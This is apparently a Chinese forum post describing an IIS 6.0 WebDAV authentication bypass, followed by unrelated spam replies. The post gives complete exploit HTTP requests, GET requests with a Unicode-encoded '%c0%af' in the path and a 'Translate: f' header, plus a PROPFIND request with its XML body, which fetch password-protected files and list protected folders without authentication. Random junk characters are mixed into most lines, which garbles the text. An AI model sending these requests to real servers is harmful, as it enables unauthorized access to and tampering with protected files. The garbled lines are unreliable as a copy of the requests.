返回列表 发新帖

绕过IIS 6.0 WebDAV的远程身份验证

3,489.2k 14
DeGe 发表于 2013-7-3 17:12:36|湖北 | 查看全部 阅读模式

漏洞发现者:Nikolaos Rangos
/ V' g0 z( [& K7 I具体漏洞存在于带WebDAV功能的IIS 6.0中
0 k! A. Y6 j3 vWeb服务器没有正确地处理Unicode命令的URI时,解析和发送回的数据.
7 f! ]: A; }# p假设有一个密码保护文件夹d:\inetpub\wwwroot\protected\
2 g; D& @/ t! I此文件夹内有一个名为 protected.zip "
, q8 G! I( |' Q, _/ b. i) Y向服务器发送一个HTTP GET请求' j: o/ v4 q4 u" S6 q
GET /  %c0%af/protected/protected.zip HTTP/1.1
4 S8 X; f# F# N+ i' F: v         Translate: f
- T" [" J. Q8 l: G% ~         Connection: close! p9 L6 s8 M. y" J5 C; N
         Host: servernameMu2 m  g  V! G  n  ~" V6 F; F
指示Web服务器处理请求使用 WebDAV的
$ d4 D, X" S6 U利用这种恶意的URI构建网络服务器发送文件到; N5 p0 e) H# R$ E
/protected/ protected.zip ”而不要求进行适当的验证" ?% f) {' W/ ?0 b8 m- ^2 P
另一个有效的请求可能会传送到Web服务器是:

GET /prot%c0%afected/protected.zip HTTP/1.1+ k$ O8 X: b: E: i
         Translate: f " T8 X1 x, c9 O& H0 {) K  s
         Connection: close & d8 g& t; ^* J
         Host: servername
2 t/ e1 X7 i* l( P) \( S- UIIS 6.0中将会删除„%c0%af” 的请求,并发送回密码保护文件而不验证.
' j3 Q" Q# I' T" W9 G& [ASP脚本不能下载,除非以这种方式提供服务的脚本源代码是启用的 ' y8 p1 t9 a2 o, D+ D  H
可以绕过访问限制的,密码保护文件夹和列表,下载,上传和修改文件
7 b7 j9 W2 R0 E  S5 o* u, \; eCopy code        PROPFIND /protec%c0%afted/ HTTP/1.1
# g/ D( V/ [+ ?7 I/ h) i: r        Host: servername
7 @0 l3 O" ?" F0 C. {7 t6 k        User-Agent: neo/0.12.2 ! a! p3 t7 g' K
        Connection: TE
4 x, Z. f8 v' u        TE: trailers
& o" u1 @0 K$ R1 O+ s6 x1 [- S        Depth: 1
( d0 M% K( A% @2 G- L        Content-Length: 288/ r3 \# W3 l% |) G$ q! ]  W, m
        Content-Type: application/xml; T+ T9 F; F+ R
        <?xml version="1.0" encoding="utf-8"?>
. ?2 e& f6 u8 V; K# U- u6 Q        <propfind xmlns="DAV:"><prop>
3 k/ m5 L$ \0 ]. z" G- W        <getcontentlength xmlns="DAV:"/>9 B" ]4 \) {/ Z" d  t5 O
        <getlastmodified xmlns="DAV:"/> ; ]) t5 P- c0 ^2 D, X8 Z1 \
        <executable xmlns="http://apache.org/dav/props/"/>   ~; [2 e0 [1 o; n
        <resourcetype xmlns="DAV:"/>. I6 d2 x$ T+ W, u  U+ p! B6 J
        <checked-in xmlns="DAV:"/>
+ x- A1 R2 @5 }9 a        <checked-out xmlns="DAV:"/>5 e* x' Q* }0 y3 y2 L; K* `! Z' |
        </prop></propfind>

IIS的回应的目录列表的文件夹中没有要求输入密码

$ T3 o- ^. P1 z* j) Y

回复|共 14 个

亮凌庚 Lv.15 发表于 2014-9-28 18:35:19|Reserved | 查看全部
怎么就没人拜我为偶像那??
ofbnbaiinfnh Lv.8 发表于 2014-9-28 18:56:51|俄罗斯 | 查看全部
女人啊真是那句话~~~无理占三分~~忘记怎么说了 呵呵 ~~你帮我想想
kwjvtwzx Lv.15 发表于 2014-9-28 18:58:46|美国 | 查看全部
这篇帖子构思新颖,题材独具匠心,段落清晰,情节诡异,跌宕起伏,主线分明,引人入胜,平淡中显示出不凡的文学功底,可谓是字字珠玑,句句经典,是我辈应当学习之典范(不好意思回错帖了
kjlqiyjws Lv.8 发表于 2014-9-28 19:11:01|INNA | 查看全部
顶顶多好,大家都来!
kwjvtwzx Lv.15 发表于 2014-9-28 19:19:41|美国 | 查看全部
我也不知道了~~你把我问蒙了 呵呵
oxdbw Lv.8 发表于 2014-10-24 18:18:04|俄罗斯 | 查看全部
什么什么啊??
uhxidjjr Lv.8 发表于 2014-10-24 18:37:08|韩国 | 查看全部
嘿...反了反了,,,,
xiaoye Lv.9 发表于 2014-10-24 18:37:24|美国 | 查看全部
哎 我我我怎么办啊??
kwjvtwzx Lv.15 发表于 2014-10-24 18:53:19|美国 | 查看全部
哥们,给我做个链接吧
爱上空心菜 Lv.7 发表于 2015-2-10 13:38:17|日本 | 查看全部
嘻嘻~` 要是只看你的话~`~`` 很容易让人家以为你也跟偶们一样是天使类~`(偷笑中````````
seazvyt 发表于 2015-2-10 13:39:08|美国 | 查看全部
呵呵 放心 如我算错 你以后来砸我的帖子 呵呵
长颈鹿王77 Lv.7 发表于 2015-2-10 13:40:29|美国 | 查看全部
呵呵 我可不敢~~~~
tohme 发表于 2015-2-10 13:40:53|欧洲和中东地区 | 查看全部
我不是来为楼主呐喊加油的,也不是对楼主进行围堵攻击的。

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

得知互动是一个融创意、设计、开发、营销、生活、互联网于一体的专业交流分享平台。
Copyright © 2026 站长技术交流论坛|互联网技术交流平台|Ai技术交流平台 版权所有 All Rights Reserved. Powered by Discuz! X5.0 鄂ICP备15006301号-5|鄂公网安备 42018502006730号
关灯 在本版发帖 扫一扫添加QQ客服 返回顶部
快速回复 返回顶部 返回列表